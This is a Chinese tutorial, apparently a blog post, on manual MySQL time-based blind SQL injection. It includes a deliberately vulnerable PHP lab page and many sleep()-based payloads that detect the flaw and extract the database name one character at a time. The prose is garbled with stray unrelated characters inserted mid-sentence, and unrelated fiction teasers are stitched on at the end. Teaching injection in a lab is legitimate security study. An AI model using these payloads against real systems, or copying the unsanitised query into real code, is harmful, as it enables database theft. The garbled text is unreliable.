Mysql時間盲注手工注入詳解

此文章建立在已經(jīng)閱讀并掌握了《Mysql 聯(lián)合查詢手工注入詳解》和Mysql 布爾型盲注手工注入詳解的基礎上

練習環(huán)境與布爾型盲注差不多，php代碼改下

<?php
    /* 關閉錯誤信息 */
    error_reporting(0);
    /* 設置header編碼 */
    header("Content-type: text/html; charset=utf-8");
    /* 連接信息 */
    $host = '127.0.0.1';
    $user = 'root';
    $pass = 'root';
    $db   = 'test';

    if(@isset($_GET['name'])){
        $conn = mysqli_connect($host,$user,$pass,$db) or die('Link False');

        $sql = "SELECT * FROM user where user='".$_GET['name']."'";
        echo '<div style=\'color:red;\'>'.$sql.'</div>';
        $res = mysqli_query($conn,$sql);
    }else{
        echo 'sql-time.php?name=user1';
    }
?>

0x00 什么是時間盲注

時間盲注指通過頁面執(zhí)行的時間來判斷數(shù)據(jù)內(nèi)容的注入方式，通常用于數(shù)據(jù)（包含邏輯型）不能返回到頁面中的場景苞也，無法利用頁面回顯判斷數(shù)據(jù)內(nèi)容，只能通過執(zhí)行的時間來獲取數(shù)據(jù)

0x01 基礎知識

這里就比較簡單了记靡，介紹一個Mysql中的流程控制

if

if(表達式,真,假)

當表達式成立時刘绣，會執(zhí)行真然磷，反之執(zhí)行假

example

0x01 手工注入

判斷注入點

就不多廢話了摄欲，上payload轿亮，具體可參考布爾型盲注的原理

/* 整型注入 */
sql-bool.php?name=user1 and sleep(5)
sql-bool.php?name=user1 and sleep(10)
/* 字符型注入 */
sql-bool.php?name=user1' and sleep(5) and '1'='1
sql-bool.php?name=user1' and sleep(10) and '1'='2
/* 字符型注入 */
sql-bool.php?name=user1" and sleep(5) and "1"="1
sql-bool.php?name=user1" and sleep(10) and "1"="2

這里為了方便看響應時間用burp來發(fā)送請求

正常請求

' and sleep(5) and '1'='1

' and sleep(10) and '1'='1

可以看到，正常訪問時胸墙，頁面響應時間為2毫秒我注，sleep(5)時響應約為5秒，sleep(10)時迟隅，約為10秒

由此可判斷頁面存在時間盲注

讀數(shù)據(jù)

原理大致與布爾型盲注一樣但骨，不過由于布爾型無法返回頁面，所以通過if來觸發(fā)sleep()函數(shù)智袭，這樣就可以通過時間判斷表達式的真或假奔缠，從而判斷數(shù)據(jù)的內(nèi)容

sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 97,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 98,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 99,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 100,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 101,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 102,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 103,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 104,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 105,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 106,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 107,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 108,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 109,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 110,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 111,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 112,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 113,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 114,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 115,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 116,sleep(5),1) and '1'='1

在其他數(shù)值時，頁面響應時間約為3毫秒

other

在判斷與116是否相等時吼野，頁面響應時間約為5秒

116

由此可判斷數(shù)據(jù)庫名第一個字符為t

其他以此類推

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末添坊，一起剝皮案震驚了整個濱河市，隨后出現(xiàn)的幾起案子箫锤，更是在濱河造成了極大的恐慌贬蛙，老刑警劉巖，帶你破解...
沈念sama閱讀 219,427評論 6贊 508
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件谚攒，死亡現(xiàn)場離奇詭異阳准，居然都是意外死亡，警方通過查閱死者的電腦和手機馏臭，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 93,551評論 3贊 395
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進店門野蝇，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人括儒，你說我怎么就攤上這事绕沈。” “怎么了帮寻？”我有些...
開封第一講書人閱讀 165,747評論 0贊 356
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵乍狐，是天一觀的道長。經(jīng)常有香客問我固逗，道長浅蚪，這世上最難降的妖魔是什么？我笑而不...
開封第一講書人閱讀 58,939評論 1贊 295
?港島之戀（遺憾婚禮）
正文為了忘掉前任烫罩，我火速辦了婚禮惜傲，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘贝攒。我一直安慰自己盗誊，他們只是感情好，可當我...
茶點故事閱讀 67,955評論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布隘弊。她就那樣靜靜地躺著哈踱，像睡著了一般。火紅的嫁衣襯著肌膚如雪长捧。梳的紋絲不亂的頭發(fā)上嚣鄙，一...
開封第一講書人閱讀 51,737評論 1贊 305
城市分裂傳說
那天，我揣著相機與錄音串结，去河邊找鬼哑子。笑死，一個胖子當著我的面吹牛肌割，可吹牛的內(nèi)容都是我干的卧蜓。我是一名探鬼主播，決...
沈念sama閱讀 40,448評論 3贊 420
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼把敞，長吁一口氣：“原來是場噩夢啊……” “哼弥奸！你這毒婦竟也來了？” 一聲冷哼從身側(cè)響起奋早，我...
開封第一講書人閱讀 39,352評論 0贊 276
萬榮殺人案實錄
序言：老撾萬榮一對情侶失蹤盛霎，失蹤者是張志新（化名）和其女友劉穎赠橙，沒想到半個月后，有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體愤炸，經(jīng)...
沈念sama閱讀 45,834評論 1贊 317
?護林員之死
正文獨居荒郊野嶺守林人離奇死亡期揪，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點故事閱讀 37,992評論 3贊 338
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時候發(fā)現(xiàn)自己被綠了规个。大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片凤薛。...
茶點故事閱讀 40,133評論 1贊 351
活死人
序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖诞仓，靈堂內(nèi)的尸體忽然破棺而出缤苫，到底是詐尸還是另有隱情，我是刑警寧澤墅拭，帶...
沈念sama閱讀 35,815評論 5贊 346
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布活玲，位于F島的核電站，受9級特大地震影響帜矾，放射性物質(zhì)發(fā)生泄漏翼虫。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點故事閱讀 41,477評論 3贊 331
男人毒藥：我在死后第九天來索命
文/蒙蒙一屡萤、第九天我趴在偏房一處隱蔽的房頂上張望珍剑。院中可真熱鬧，春花似錦死陆、人聲如沸招拙。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,022評論 0贊 22
一樁弒父案措译，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽别凤。三九已至，卻和暖如春领虹，著一層夾襖步出監(jiān)牢的瞬間规哪，已是汗流浹背。一陣腳步聲響...
開封第一講書人閱讀 33,147評論 1贊 272
情欲美人皮
我被黑心中介騙來泰國打工塌衰，沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留诉稍，地道東北人。一個月前我還...
沈念sama閱讀 48,398評論 3贊 373
代替公主和親
正文我出身青樓最疆，卻偏偏與公主長得像杯巨，于是被迫代替她去往敵國和親。傳聞我的和親對象是個殘疾皇子努酸，可洞房花燭夜當晚...
茶點故事閱讀 45,077評論 2贊 355